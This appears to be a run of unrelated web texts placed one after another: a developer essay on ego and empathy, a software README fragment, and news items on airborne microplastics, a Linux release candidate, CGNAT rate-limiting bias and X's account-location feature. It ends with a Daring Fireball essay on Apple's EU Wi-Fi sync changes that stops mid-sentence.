Still, I get why initialisms run rampant in technical discussions. You can be sure that most discussions of particle physics would be incomprehensible to outsiders, not necessarily because of the concepts, but because of the terminology.
Simply mashing a few letters together can be empowering for ourselves while being exclusionary for others. It’s an artifact—albeit a small one—of our egos. We know what the technobabble means. Our justified place in the universe is maintained.
Sometimes we express our egos more deliberately. Developers have a clear tendency towards gatekeeping. For most, it’s an honest mistake. There’s a fine line between holding others to a certain expectation versus actively keeping people on the outside. When we see ourselves doing this we can correct it easily enough.
Sadly there are developers who seemingly like to gatekeep. They get to feel like wizards in their towers with their dusty books and potions. But, it’s actually self-limiting. Gatekeeping by definition means you’re fixed in place and never moving, standing guard for eternity.
My point is our egos can “leak” in so many ways that it takes diligence to catch it let alone correct it. The following is a short, incomplete list of typical statements we as developers might say or hear at work. If you parse them more precisely each one is an attempt at self-justification:
“That’s the way we’ve always done it.”
“It’s not that complicated! You just…”
“Yeah, I should be able to finish this in a day.”
“This legacy codebase is an absolute disaster.”
“Assign it to me. Nobody else will be able to fix it.”
“You can’t be a senior dev. You don’t know anything about…”
“Ugh, our morning standup is so useless.”
“This feature is too important to assign to the junior dev.”
“We should start using this new tool in our pipeline.”
“We should never use that new tool in our pipeline.”
Everything Is Bigger Than You
The ego is concerned with the self but very easily becomes something harmful in the absence of new information or context. Indeed, the ego nudges us to self-justify so much that one could argue it actively
resists
new information when left unchecked.
You may have read one of the example statements above with some familiarity and thought, “But what if I’m right?”
To which I’d say: OK, but should that be your default stance? Why might you feel the need to immediately start a conversation with a self-justification? There are ways to adjust our approach, make our points, and accept new information all at the same time.
In any interaction—be it a meeting, Slack thread, or water cooler conversation—we must remember that
the matter at hand is bigger than us in ways we don’t yet understand
.
To make these concepts more actionable I find it simpler to define them in terms of the purposes they serve. Specifically…
Empathy is how we
gather new information
.
Humility is how we
allow information to change our behavior
.
This framing also helps remind us what empathy and humility
are not
. It’s not about putting yourself in another’s shoes, as the saying goes. It’s not about being submissive or a pushover. It’s not about altruism or self-sacrifice. We can easily practice empathy and humility without it ever being at our own expense.
The Pursuit Of Information
I don’t know about you but I go to work to solve problems, be creative, and build shit. I can’t think of a single instance where an unruly ego solved anything I’ve worked on. Ego just makes an existing challenge worse. Solutions require information I don’t have yet.
Empathy and humility are usually top of mind during situations of pain or distress, but they’re really aspects of emotional intelligence that should be activated at all times. Once you adjust your mindset to treat them as basic tools for the
pursuit of information
you’ll see opportunities to leverage them everywhere.
Developers can apply this mindset with almost anybody they come into contact with. Fellow developers, naturally. But also less technical teammates (e.g., QAs, designers, product owners, stakeholders) who have their own unique skills and context that our success depends on. And of course our users should be at the center of every problem we’re working to solve. Lastly, even executives and upper management have some insight to offer if you dare (
but only up to a certain point
).
“Be Curious, Not Judgmental”
I’ve been waiting years for a chance to work
Ted Lasso
into one of my essays. Today’s the day, readers.
The titular character is such an archetype for leadership that my jaw hit the floor when I first watched the show. The example Ted sets has spawned
countless think pieces about leadership and management
. Suffice it to say he exhibits all of my principles over the series’ 34 episodes. He’s empathy and humility sporting a mustache. He’s the absence of ego personified.
I highly recommend watching the show but to get a taste this 5 minute clip is worth your time. This is the famous “darts scene”…
There’s a common and derisive attitude that qualities like empathy or humility are signs of weakness. You have to get all up in your feelings. Ew! But they require enormous reserves of strength, patience, and determination. It’s those who follow their egos who are weak.
Letting your ego take control is the easiest thing in the world. Just ask any toddler throwing a temper tantrum. Resisting those impulses and remaining calm, on the other hand, has been a virtue humanity has aspired to for thousands of years. As the Roman emperor and
Stoic
philosopher
Marcus Aurelius
wrote: “The nearer a man comes to a calm mind, the closer he is to strength.”
You’re Neither Ted Lasso Nor A Roman Emperor
The practice of empathy, humility, and keeping your ego in check will
test you daily
. The feedback I’ve received the most from my coworkers is that I’m extraordinarily calm and even-keeled in any situation—even situations where I’d be right to freak out.
Is that just naturally my personality? Maybe in part, but
remaining calm is a choice
. I’m actively choosing to favor solutions over my own ego. To my colleagues past and present I confess to you now that any time you’ve seen me calm, cool, and collected I was very likely
internally screaming
.
If this sounds like a lot of work you might be wondering if it’s worth it. I think it is. At the very least your coworkers and colleagues will like you better. That’s no small thing.
In all seriousness, the positive feedback I get most about the developers I manage is when they’ve demonstrated empathy and humility while dialing back their egos. This is because they’re people we can work with—literally. Nobody wants to work with a narcissist or a rock star. Nobody is materially impressed by
how many lines of code we wrote
, or how fast we wrote it.
When people want to work with us—or even look forward to it—that means we have trust and respect. We’ll be on proper footing for working effectively as a group to solve problems. For developers this looks like coaching a junior developer, hopping on a quick call to pair with somebody, or understanding the business value of the next backlog item. For leaders this looks like people who feel empowered to do their work, who can proactively identify issues, or who can rally and adapt when circumstances change.
Anybody can do this! I can’t think of any other career advice that’s as universal as empathy and humility. Everybody is capable of, at any point in their lives, small yet impactful improvements.
So remember—watch your ego and look for opportunities to leverage empathy and humility in the pursuit of information so that you can solve problems together.
In
my next essay on this subject
I’ll get into the practical. What I like about this advice is that, while there’s much we can do, we don’t have to do it all to see some benefit. We can pick and choose and try something out. We can take your time and grow. Nobody’s perfect, not even Ted Lasso. Even if we take after a character like
Roy Kent
we can still call that a win. Just watch the show, OK?
An open-source photo editor & digital compositor for the web
GNU GPL, see COPYING. "libtorrent/src/utils/sha_fast.{cc,h}" is
originally from the Mozilla NSS and is under a triple license; MPL,
LGPL and GPL. An exception to non-NSS code has been added for linking to OpenSSL as requested by Debian, though the author considers that library to be part of the Operative System and thus linking is allowed according to the GPL.
Use whatever fits your purpose, the code required to compile with
Mozilla's NSS implementation of SHA1 has been retained and can be
compiled if the user wishes to avoid using OpenSSL.
DEPENDENCIES
libcurl >= 7.12.0
libtorrent = (same version)
ncurses
BUILD DEPENDENCIES
libtoolize
aclocal
autoconf
autoheader
automake
'Invisible' microplastics spread in skies as global pollutant
Minuscule airborne plastic particles are spreading to all corners of the planet, penetrating deep into human bodies and sparking alarm among researchers of the relatively new subject matter.
Studies are shedding light on the origins, transport mechanisms and impact of these pollutant microplastics, which are too small to be seen with the naked eye.
They have been found in skies above Mount Fuji, in European rain, Arctic snow and within human bodies. These byproducts of human activity could also be fueling extreme weather conditions.
“Marine microplastic pollution has drawn so much attention that the ocean has been assumed as the final destination for microplastics, but recent studies indicate that airborne plastic pollution is spreading at an alarming rate,” said Hiroshi Okochi, a Waseda University professor of environmental chemistry.
Okochi leads a research team that has been studying airborne microplastics since 2017 and was the first to show that the pollutants had made their way into cloud water.
According to studies conducted on how plastic waste is damaging marine creatures and the ocean environment, plastic litter that flows into seas degrades into “marine microplastics,” which measure 5 millimeters or less in particle size.
By contrast, few studies are available on “airborne microplastics,” most of which measure less than 2.5 micrometers (0.0025 millimeter) across.
One study published in 2016 found plastics in fiber form in rainwater in Paris, showing that plastic particles were wafting in the air.
Okochi’s team in 2023 published a study that showed water in clouds covering the top of Mount Fuji contained 6.7 pieces of microplastics per liter.
Airborne microplastics travel in different manners at different altitudes.
In the free troposphere, an atmospheric layer extending above an altitude of 2,000 to 2,500 meters, substances are transported intercontinentally over long distances by prevailing westerly winds and other air currents. They are rarely affected by things on the ground.
The microplastic particles found above 3,776-meter-tall Mount Fuji where clouds can form were carried far from their sources, Okochi’s team said.
POSSIBLE CAUSE OF TORRENTIAL DOWNPOURS
According to one theory, when a large-scale atmospheric depression forms and generates ascending air currents, ground-based and seaborne microplastics are swirled up by the wind and sea spray and carried high up into the skies.
Once in the free troposphere, strong winds push the microplastics to higher levels and at enormous speeds, polluting the layer.
A team of scientists from Germany and Switzerland reported that they had found more than 10,000 pieces of microplastics per liter of snow in the Arctic. They said such microplastics are likely traveling over long distances in the air and being deposited with snow.
Microplastics may even be inducing cloud formation.
Clouds naturally form when dust serves as nuclei for water vapor to condense on. Typical ingredients of plastic products, such as polyethylene and polypropylene, naturally repel water.
Microplastics, however, change in chemical structure and obtain hydrophilicity, or affinity for water, when they are degraded by ultraviolet rays.
That likely facilitates cloud formation through vapor condensation, Okochi said.
Some experts say microplastics could be causing sudden torrential downpours and other extreme weather phenomena.
Studies have also found that microplastics, when degraded by ultraviolet rays, emit greenhouse gases, such as methane and carbon dioxide.
PLASTICS ENTERING LUNGS
Although plastics have been found in various regions of the human body, it is not yet known what impact the airborne substances have on health.
Airborne microplastic particles measuring 1 micrometer (0.001 millimeter) or less in size are believed capable of reaching the alveoli of the lung.
A study conducted in Britain said microplastics were detected in 11 of 13 lung tissue samples from patients who underwent lung surgeries. The highest levels were found in the lowermost region of the lung.
A human breathes more than 20,000 times a day, which adds up to 600 million to 700 million times throughout a lifetime.
There is no standard method for measuring airborne microplastics, so estimated amounts being inhaled by humans vary wildly from one research article to another.
Okochi said he hopes to develop a unified method for measuring the shapes, types, sizes and concentrations of airborne plastics so researchers across the globe can use it in their observations.
“We inevitably end up inhaling airborne microplastics without knowing it because the pollution they are causing is invisible,” Okochi said. “So little is clearly known about their possible impact on health and the environment, which is only beginning to be discussed. There should be more fact-finding studies on the matter.”
HOPES ON FOREST ADSORPTION
Airborne microplastics come from various sources, including road dust, tire abrasions, artificial turf and clothing.
Effective measures to reduce exposure include avoiding the use of synthetic fiber clothes and washing clothes in mesh laundry bags to prevent the garments from rubbing together.
In the larger picture, society could reflect on whether certain plastic products in close surroundings are really necessary or could be replaced with non-plastic materials.
For airborne plastics that are too small to be visible, absorption by forests is drawing attention as a hopeful measure.
A group of researchers, including Okochi and scientists from Japan Women’s University, found that “konara” oak leaves adsorb airborne plastics through “epicuticular wax,” a coating layer on the leaf surface that defends the tissue from ultraviolet rays and external enemies.
Konara forests in Japan can absorb an estimated 420 trillion pieces of airborne microplastics a year, Okochi said,
His team is now studying the use of fast-growing paulownia trees to fight the airborne microplastics.
There are hopes this tree variety can address other environmental problems. The trees absorb large volumes of carbon dioxide and can be used to absorb radioactive substances in the soil in Fukushima Prefecture, the site of the 2011 nuclear disaster.
“Planting the trees on the roadside could help reduce inhalation by humans,” Okochi said. “We hope to pursue the potential of this new emissions reduction measure using fast-growing paulownia trees to lower the risk of human exposure.”
Kernel prepatch 6.18-rc7
Linux Weekly News
lwn.net
2025-11-24 00:10:02
Linus has released 6.18-rc7, probably the
last -rc before the 6.18 release.
So the rc6 kernel wasn't great: we had a last-minute core VM
regression that caused people problems.
That's not a great thing late in the release cycle like that, but
it was a fairly trivial fix, and the cause wasn't ...
Linus has released
6.18-rc7
, probably the
last -rc before the 6.18 release.
So the rc6 kernel wasn't great: we had a last-minute core VM
regression that caused people problems.
That's not a great thing late in the release cycle like that, but
it was a fairly trivial fix, and the cause wasn't some horrid bug,
just a latent gotcha that happened to then bite a late VM fix. So
while not great, it also doesn't make me worry about the state of
6.18. We're still on track for a final release next weekend unless
some big new problem rears its ugly head.
Doge 'doesn't exist' with eight months left on its charter
Before the potential of the internet was appreciated around the world, nations that understood its importance managed to scoop outsized allocations of IPv4 addresses, actions that today mean many users in the rest of the world are more likely to find their connections throttled or blocked.
So says Cloudflare, which last week published
research
that recalls how once the world started to run out of IPv4 addresses, engineers devised network address translation (NAT) so that multiple devices can share a single IPv4 address. NAT can handle tens of thousands of devices, but carriers typically operate many more. Internetworking wonks therefore developed Carrier-Grade NAT (CGNAT), which can handle over 100 devices per IPv4 address and scale to serve millions of users.
That’s useful for carriers everywhere, but especially valuable for carriers in those countries that missed out on big allocations of IPv4 because their small pool of available number resources means they must employ CGNAT to handle more users and devices. Cloudflare's research suggests carriers in Africa and Asia use CGNAT more than those on other continents.
Cloudflare worried that could be bad for individual netizens.
“CGNATs also create significant operational fallout stemming from the fact that hundreds or even thousands of clients can appear to originate from a single IP address,” wrote Cloudflare researchers Vasilis Giotsas and Marwan Fayed. “This means an IP-based security system may inadvertently block or throttle large groups of users as a result of a single user behind the CGNAT engaging in malicious activity.”
“Blocking the shared IP therefore penalizes many innocent users along with the abuser.”
The researchers also noted “traditional abuse-mitigation techniques, such as blocklisting or rate-limiting, assume a one-to-one relationship between IP addresses and users: when malicious activity is detected, the offending IP address can be blocked to prevent further abuse.”
Because CGNAT is more prominent, and more heavily used, in Africa and Asia, they suggested “CGNAT is a likely unseen source of bias on the Internet.”
“Those biases would be more pronounced wherever there are more users and few addresses, such as in developing regions. And these biases can have profound implications for user experience, network operations, and digital equity,” the researchers wrote.
To test that hypothesis, the pair went looking for CGNAT implementations using traceroute, WHOIS and reverse DNS pointer (PTR) records, and existing lists of VPN and proxy IP addresses. That effort yielded a dataset of labeled IPs for more than 200K CGNAT IPs, 180K VPNs and proxies and close to 900K other IPs relevant to the study of CGNAT. They used that dataset, and Cloudflare’s analysis of bot activity, to analyze whether CGNAT traffic is rate-limited with the same frequency as traffic from un-abstracted IP addresses.
That effort found indicators of bias, because non-CGNAT IPs are more likely to be bots than CGNAT IPs, but ISPs are more likely to throttle traffic from the latter.
“Despite bot scores that indicate traffic is more likely to be from human users, CGNAT IPs are subject to rate limiting three times more often than non-CGNAT IPs,” the pair wrote. “This is likely because multiple users share the same public IP, increasing the chances that legitimate traffic gets caught by customers’ bot mitigation and firewall rules.”
The authors therefore conclude: “Accurate detection of CGNAT IPs is crucial for minimizing collateral effects in network operations and for ensuring fair and effective application of security measures.”
They suggest ISPs that run CGNAT get in touch to help the community better understand the challenges of using the tech without introducing bias.
The authors also acknowledge that all these problems would go away if the world just moved to IPv6, and that CGNAT was supposed to tide network operators over until that happened. They also note the old proverb – “Nothing is more permanent than a temporary solution” – as the likely reason CGNAT remains relevant today. ®
X's new country-of-origin feature reveals many 'US' accounts to be foreign-run
Elon Musk's X, formerly Twitter, has rolled out a feature where going to the ‘Joined’ tab on one's profile, displays the country of origin for that account.
Elon Musk's X, formerly Twitter, has introduced the country of origin feature that seems to have thrown both the
MAGA
and Democrats' worlds online into chaos. Several profiles online, that had pushed certain narratives are now being found to have been operating from outside the US.
X has introduced a feature that lets people see where an account is based out of. (REUTERS)
The social media platform introduced a feature where one can see the country the account is based in. One has to head to an account and click on the date joined tab, which opens up onto a new page. This shows the country where that particular account is being operated from. While the feature was briefly removed after its introduction, it has now been added again, and both sides of the political spectrum are having a field day, calling out each other online.
What to know about ‘American’ accounts based out of US
The accounts being discussed here have pushed agendas within the US, and commented on US politics regularly. Many are also named to echo political movements, like some MAGA accounts.
However, these ‘political influencers’ have been found to be based outside the US, raising questions about the motives.
One profile going by 'MAGA NATION' with a follower count of over 392,000, is based out of eastern Europe. Similarly, ‘Dark Maga’ a page with over 15,000 followers is based out of Thailand. ‘MAGA Scope’ which boasts over 51,000 followers is actually operated out of Nigeria, and ‘America First’, an account with over 67,000 followers is based out of Bangladesh.
“At this time thousands of MAGA-aligned influencer accounts and large political pages that claim to be based in the U.S. are now being investigated and exposed with many of them traced to India, Nigeria, and other countries,” a news aggregator page on X noted.
It wasn't just on the MAGA side. An account going by ‘Ron Smith’ whose bio claims he's a ‘Proud Democrat’ and ‘Professional MAGA hunter’ is operated out of
Kenya
. The account has over 52,000 followers.
‘Republicans against Trump’ an anti-
Donald Trump
page on X, which tries to push politics against MAGA, was reportedly operating out of Austria. While the location now shows US, X notes that the account location might not be accurate due to use of VPN. “The Anti-Trump account “Republicans Against Trump” which 1M followed has been identified as a non-American from Austria and is currently using a VPN to hide their location,” a page said, making note of this.
‘Republicans against Trump’ has over 978,000 followers.
On a side note, an account going by ‘Mariana Times’, with over 78,000 followers, which posts pro-Israel content has been found to be based out of India.
People within the MAGA orbit have also reacted to this new feature. Congresswoman Anna Paulina Luna wrote on X from her personal account, “All of these pretend “pro-America” accounts that were pushing infighting within Maga are literally foreign grifters. I’m telling you, the foreign opp is real and so are the bot accounts.”
Alexis Wilkins, FBI director Kash Patel's girlfriend, also added, “I hope that everyone sees, regardless of their specific reason, that the enemy is outside of the house. The people posing as Americans with big American opinions but are actually operating from a basement across the world have one common goal - to destroy the United States. We have our issues, but we really can’t allow them to succeed.”
Stay updated with
US News
covering politics, crime, weather, local events, and sports highlights. Get the latest on
Donald Trump
and American politics also realtime updates on
Indonesia ferry fire
.
Stay updated with
US News
covering politics, crime, weather, local events, and sports highlights. Get the latest on
Donald Trump
and American politics also realtime updates on
Indonesia ferry fire
.
★ Exploring, in Detail, Apple’s Compliance With the EU’s DMA Mandate Regarding Apple Watch, Third-Party Accessories, and the Syncing of Saved Wi-Fi Networks From iPhones to Which They’re Paired
Daring Fireball
daringfireball.net
2025-11-23 23:00:00
The bottom line is that users setting up new Apple Watches in the EU will now get a somewhat slightly worse experience in the name of parity with accessories made by third-party companies. It remains to be seen whether users of third-party iPhone accessories and peripherals in the EU will see any be...
But now comes word of the first feature that Apple is limiting or removing in an existing product to comply with the DMA: Wi-Fi network sync between iPhone and Apple Watch, which is poised to change in the EU next month, with the 26.2 releases of iOS and WatchOS. The news was broken by Nicolas Lellouche,
reporting for the French-language site Numerama
. I’m quoting here from Safari’s English translation of his original report:
Apple has been warning for several months that it could one day,
if it deems it necessary, disable functions in the European Union
to “protect its users”. This day could arrive in December, with
the iOS 26.2 update.
On November 4, Apple announced to Numerama that it had made the
decision to disable Wi-Fi synchronization between an iPhone and an
Apple Watch in Europe so as not to have to comply with the
European Commission’s request, which wants to force it by the end
of 2025 to open the iPhone’s Wi-Fi to third-party accessories.
This announcement follows the opening of the AirPods Live
Translation function in Europe, with a new API to allow
competitors to use the microphones and speakers of AirPods and
iPhone simultaneously. [...]
Apple indicates that the European Commission is asking it to
replicate the link between an iPhone and an Apple Watch, but with
third-party products. Apple, after thinking long about how to
implement this function, finally decided to reject the European
request. Since Europe requires that third-party products be
treated like the Apple Watch, then Apple disables the function on
Apple Watch. This allows it to comply with the DMA.
Lellouche’s report at Numerama broke this story (the reports at
MacRumors
and
9to5Mac
are both based on Numerama’s), but the above is not an accurate summary of what Apple is doing with iOS 26.2.
1
Apple
is
complying with the DMA, and they’re
not
disabling Wi-Fi network synchronization between an iPhone and a paired Apple Watch. What Apple is doing, in order to comply with the DMA, is changing how Wi-Fi networks sync with Apple Watch (in the EU), and offering new APIs in the EU for third-party paired devices to put them on equal (or near-equal?) footing with Apple Watch (in the EU).
This change should be relatively limited. Honestly, I don’t think many Apple Watch users in the EU will even notice. But it is at least mildly annoying, and the relatively minor, very specific nature of this particular DMA mandate makes it a telling example of the European Commission’s overreach.
Currently, when you pair a new Apple Watch with an iPhone, iOS transfers to WatchOS the iPhone’s entire list of saved Wi-Fi networks and their passwords — directly, device-to-device. As iOS learns of new networks that the user joins from their iPhone, that information continues to be shared with any Apple Watches paired to that iPhone. The utility of this is that if you’re wearing your Apple Watch, but don’t have your iPhone nearby, your watch will join an available saved Wi-Fi network at your location. Let’s say you go for a run or walk, with only your Apple Watch, and you stop at a cafe for a beverage. If you’ve ever joined the Wi-Fi network at that cafe from your iPhone, your Apple Watch will join that network automatically. It should, and in my personal experience does, just work.
The EU mandate to Apple is
not
that Apple must grant to third-party devices and their iOS companion applications this same functionality as it stands today — that is to say, access to the entire history of the iPhone’s known Wi-Fi networks. The EU mandate is that Apple must grant to third-party devices the same level of access to Wi-Fi network information that Apple Watch has. Apple is complying with this mandate in two ways: (a) by changing how much Wi-Fi network information an Apple Watch gets from the iPhone to which it is paired; and (b) creating a new framework in iOS 26.2 (gated by a new entitlement),
Wi-Fi Infrastructure
, that provides a set of public APIs, available only to apps in the EU, to (per the framework’s description) “share Wi-Fi network credentials securely between devices and connected accessories.”
The change for Apple Watch in the EU is that starting with iOS 26.2, when a new (or reset) Apple Watch is set up, the Apple Watch will no longer have the user’s list of saved Wi-Fi networks automatically synced from their iPhone. Only future networks will be synced — the same level of access that the new Wi-Fi Infrastructure framework is making available to third-party accessories.
Under the new rules for Apple Watch in the EU, an existing (that is to say, already configured) watch that is upgraded to WatchOS 26.2 will still remember all Wi-Fi networks it already knew about. But a new Apple Watch will only be able to automatically connect to Wi-Fi networks that its associated iPhone saves
after
the Apple Watch was set up and paired. So when an EU Apple Watch owner with a new watch visits a known location, and doesn’t have their iPhone with them, the watch won’t be able to join that location’s Wi-Fi automatically, unless the paired iPhone has connected to and saved that network
after
the watch was paired.
With iOS 26.2, the behavior for users outside the EU will remain unchanged from iOS 26.1 and prior — both for Apple Watch and for third-party accessories.
A user’s Wi-Fi history can be used to glean significant information about them. Who they know (other homes’ networks), where they’ve been (medical providers, restaurants, airports), and more. Apple’s new policy for Apple Watch and third-party devices mitigates the sharing of historical networks, but with the sharing of future networks as the associated iPhone joins them, there’s still a risk here of third-party companies doing things with the user’s Wi-Fi network information that the user doesn’t understand, or doesn’t realize they’ve consented to.
One way to look at Apple’s options for complying with this particular DMA mandate is by considering the extremes. On the one extreme, Apple could have just granted third-party peripherals in the EU the exact same access to users’ iPhone Wi-Fi network history that Apple Watch has gotten until now (and will continue to get outside the EU). On the other extreme, Apple could have cut off Wi-Fi network syncing to the Apple Watch altogether, requiring users to connect to each Wi-Fi network manually, using the Watch itself or the Apple Watch app on iPhone. Instead, Apple chose a middle ground — limiting Wi-Fi network history sync to the Apple Watch in the EU in ways that it isn’t limited anywhere else in the world, but granting third-party accessories in the EU access to these new Wi-Fi Infrastructure APIs that aren’t available outside the EU.
Critics might argue that while this middle ground is technically compliant with the DMA, it’s not compliant with the
intention
of the DMA, which would be for the Apple Watch not to lose any functionality in the EU, and for Apple to provide APIs to allow third-party devices all of the Wi-Fi syncing features currently available to Apple Watch. Apple would argue, and I agree, that the European Commission’s intentions are incoherent in this regard. The EC insists that Apple should protect users’ privacy and security, while also insisting that Apple grant access to third-party apps and devices that can potentially compromise users’ privacy and security.
There’s a reason why Apple isn’t offering the new Wi-Fi Infrastructure framework outside the EU, and that’s because they don’t believe it’s a good idea to grant any access at all to your saved Wi-Fi networks to third-party apps and devices. Especially without being able to specify a policy that Wi-Fi network information should be treated the way Apple treats it — remaining exclusively on device.
The skeptical take on Apple’s motivations in this situation is that Apple is spitefully removing functionality from Apple Watch rather than offering new APIs to provide third-party devices with the same that functionality Apple Watch currently has, and that Apple’s intention here is, somehow, primarily about trying to drive anti-DMA sentiment amongst its EU users. This is, in fact, the skeptical take on every single aspect of Apple’s compliance with the DMA: spiteful “malicious compliance” that, somehow, is intended to engender grassroots opposition to the DMA amongst Apple customers in the EU. I don’t think that’s an accurate take overall, but in this particular case with Apple Watch and Wi-Fi network sync, it’s almost silly.
Part of what makes this particular situation clarifying is that it’s so specific. It’s not about allowing third-party devices and their corresponding iOS apps to do
everything
that Apple Watches, and the Apple Watch iOS companion app, can do. It’s very specifically about the sharing of known Wi-Fi networks. (There will, surely, be other such situations to come regarding other features, for other Apple devices.) And as I described above, very few Apple Watch owners in the EU are likely to notice the change. How many Apple Watch users today realize that their watch automatically connects to known Wi-Fi networks when their iPhone is outside Bluetooth range?
If Apple were motivated by spite, and were trying to turn EU Apple Watch owners against the DMA, they’d just remove all Wi-Fi network syncing between the watch and its paired iPhone. Not just the historical list of all networks the iPhone has ever connected to, but the continuous sync of new networks the iPhone joins after the Apple Watch is paired.
That
would be a change Apple Watch users would be more likely to notice. But it’s not what Apple is doing. They’ve engineered an entire framework of public APIs to comply with the EC’s mandate.
But the reporting to date on this situation, starting with Numerama, paints the picture that Apple
is
dropping all Wi-Fi sync between WatchOS and iOS in the EU, and that Apple is refusing to make Wi-Fi network information available to third-party accessories.
Here’s Michael Tsai
, after quoting from Tim Hardwick’s summary at MacRumors of Numerama’s report:
It seems perfectly reasonable that if I have a third-party watch I
should be able to opt into having my phone share Wi-Fi info with
it. You can debate whether mandating this is the proper role of
government, but the status quo is clearly anti-competitive and bad
for the user experience. I’m open to hearing a story where Apple’s
position makes sense, but so far it just seems like FUD to me.
What is the argument, exactly? That Fitbit, which already has its
own GPS, is going to sell your access point–based location
history? That Facebook is going to trick you into granting access
to their app even though they have no corresponding device?
Tsai is making a few wrong assumptions here. First, Apple
is
enabling users (in the EU) to opt into having their iPhone share Wi-Fi information with third-party devices. Second, this mandate is not specific to smartwatches — it applies to any devices that can pair with an iPhone and have corresponding iOS partner apps. So Meta, with their lineup of smartglasses,
does
have corresponding devices. And,
per Apple’s public statements
, it is Meta in particular that has been zealously pursuing interoperability mandates pursuant to the DMA. I think it’s entirely possible that this entire issue regarding Wi-Fi network sharing was prompted by Meta’s interoperability requests to the European Commission.
2
As for the argument regarding why Apple has chosen to comply in this way, what is essential to note is that
none
of this Wi-Fi network information shared between iOS and WatchOS
is ever sent to or seen by Apple
. Apple doesn’t see the network passwords, doesn’t see the names of the networks, and doesn’t even know when a device has joined a new network. All of this is exclusively on-device, and when the information is exchanged between an iPhone and paired Appel Watch, it’s transferred device-to-device. (This is also true when you use Apple’s features to share Wi-Fi passwords with nearby friends. It’s device-to-device and entirely private and secure. Apple doesn’t even know that person A sent a Wi-Fi password to person B, let alone know the name of the network or the password.)
As someone who relies a lot on the Watch (especially now that
WhatsApp works locally on it), I’d say we have officially reached
the point where Apple is on the verge of actively harming their
user experience for no good reason whatsoever. I honestly don’t
know if this is bull-headedness or malicious compliance.
On the other hand, someone at the EU clearly prefers being in the
limelight by regulating against evil US corporations in ways that
affect very small parts of the general population rather than,
say, go after Asian smart TV manufacturers that are present in
millions of homes and resell data on Europeans’ TV viewing habits.
No notes on Carmo’s second point. But regarding the first, his opinion is founded on incorrect assumptions. Apple clearly thinks it’s a bad idea to share any Wi-Fi information at all with third-party devices, but they’ve created an entire new framework for use within the EU to allow it, just so they can continue syncing any Wi-Fi network information at all with Apple Watch. Far from harming the user experience, Apple is bending over backwards to make the Apple Watch experience as good as possible while balancing the privacy and security implications of this DMA mandate. Rather than take away all Wi-Fi network syncing, Apple is leaving most of it in place, and only eliminating (in the EU) the part at the very beginning, where, during the set up process, all of the current networks saved on the iPhone are synced to the Apple Watch.
Given the mandate regarding the DMA, and given the privacy implications of sharing any of this information with third-party developers and peripheral makers, Personally, I think it would have been reasonable for Apple to take the extreme position of simply disallowing Wi-Fi network information syncing to any and all devices, including Apple Watches, in the EU. But Apple isn’t doing that, and they’ve undertaken a significant software engineering effort — just for the EU — to support the path they’ve chosen. Carmo’s critique seems predicated on the assumption that Apple is just cutting off all Wi-Fi network sharing.
Given that Apple’s compliance needs to account for potentially untrustworthy device makers — whether by
intent
, or
incompetence
— not syncing all known networks seems like a reasonable trade-off.
Why simply not ask the user whether or not to share WiFi history
identically whether connecting to an Apple product or a Meta
product?
That is, in fact, what Apple is doing. But the privacy implications for a user are, in fact, different when an iPhone’s saved Wi-Fi networks are shared to, say, a Meta product than to another Apple product. It’s worth emphasizing that the European Commission’s mandate does not permit Apple to require those third-party companies to treat this information with the same privacy protections that Apple does. Apple keeps that information exclusively on-device, but Apple is not permitted to require third-party peripheral makers to do the same.
Consider
the iOS system prompt for App Tracking Transparency
: the user’s two choices are “Ask App Not to Track” and “Allow”. It’s a common and natural question why the first option is “Ask App Not to Track” rather than “Don’t Allow”. It would certainly look better if the options were “Don’t Allow” and “Allow”. But Apple deliberately made the first button “Ask App Not to Track” because ATT is, at least partially, a
policy
, not a complete technical guarantee. If an app prompts for ATT permission and the user chooses “Ask App Not to Track”, that app should definitely
not
go ahead and attempt to track the user’s activity across other apps. But, technically, it could try.
3
I presume, if they do, that Apple will rap the developer’s knuckles in the App Store review process, or even suspend the app’s developer account.
4
Under the EU’s mandate to Apple regarding Wi-Fi network access for third-party devices and their corresponding iOS apps, Apple is not permitted even to set a policy that these apps must pinky swear to keep the information private and on-device. Nor is the EU itself demanding it. If a third-party device-maker wants to send your iPhone’s Wi-Fi network history to their servers and save it, that’s up to them,
not
Apple, per the EC. Apple sees that as a problem.
5
You can argue — and some will, as I think Michael Tsai does in the passage I quote above, and as Tim Sweeney clearly does — that this ought to be up to the user. If a user says they’re fine with their Wi-Fi network information being shared with a third-party accessory they’ve paired with their iPhone, that’s up to them. That is a reasonable take. But I also think Apple’s perspective is reasonable as well — that they should be able to make products where this isn’t possible.
The “it should be up to the user” take benefits informed, technically savvy users. The “it shouldn’t be possible” take benefits uninformed, un-savvy users — users who in many cases have decided that they simply trust Apple. The iPhone brand message — the brand message behind the Apple ecosystem — is that Apple doesn’t allow things that are dangerous to security or privacy. I do not think most iPhone users expect a third-party device they pair to their iPhone to be able to send their entire history of Wi-Fi networks back to the company that made the device. (Most iPhone users also don’t realize how sensitive, privacy-wise, their complete Wi-Fi network history is.)
It’s fair to point out that the “it should be up to the user” take is more beneficial to third-party accessory makers than the “it shouldn’t be possible take”. And that this conflict of interest — where the same limitations that protect iPhone users’ privacy by definition disadvantage third-party devices in ways that Apple’s own devices that connect to iPhones are not — works not just in iPhone users’ favor, privacy-wise, but also in Apple’s favor, financially. Apple can sell more Apple Watches if they work better with iPhones than smartwatches from other companies do. That’s obviously true, but that’s just another way of saying that first-party products have inherent advantages that third-party products don’t, to which I say:
Duh
. Apple’s own peripherals, like Apple Watch, can do things that third-party peripherals can’t because Apple can trust its own devices, and its own software, in ways that it can’t trust devices and companion apps made by other companies.
It’s natural for a company to bootstrap a new product on the back of an existing successful one. Meta’s Threads social network, for example, uses the same usernames and sign-in system as Instagram, which is arguably the most successful social network in the world. Should Meta not have been permitted to do that? Or should they be forced to allow
anyone
to create new competing social networks using Instagram user accounts as the ID system?
It’d be pretty weird if Apple limited itself, when designing and engineering features that integrate experiences across
its own
devices, to what it would allow third-party developers to do. It’d be even weirder if Apple allowed third-party developers to do everything Apple’s own software can do.
6
For at least the last
15 years
, I’ve
repeatedly
emphasized that Apple’s priorities
are in this order
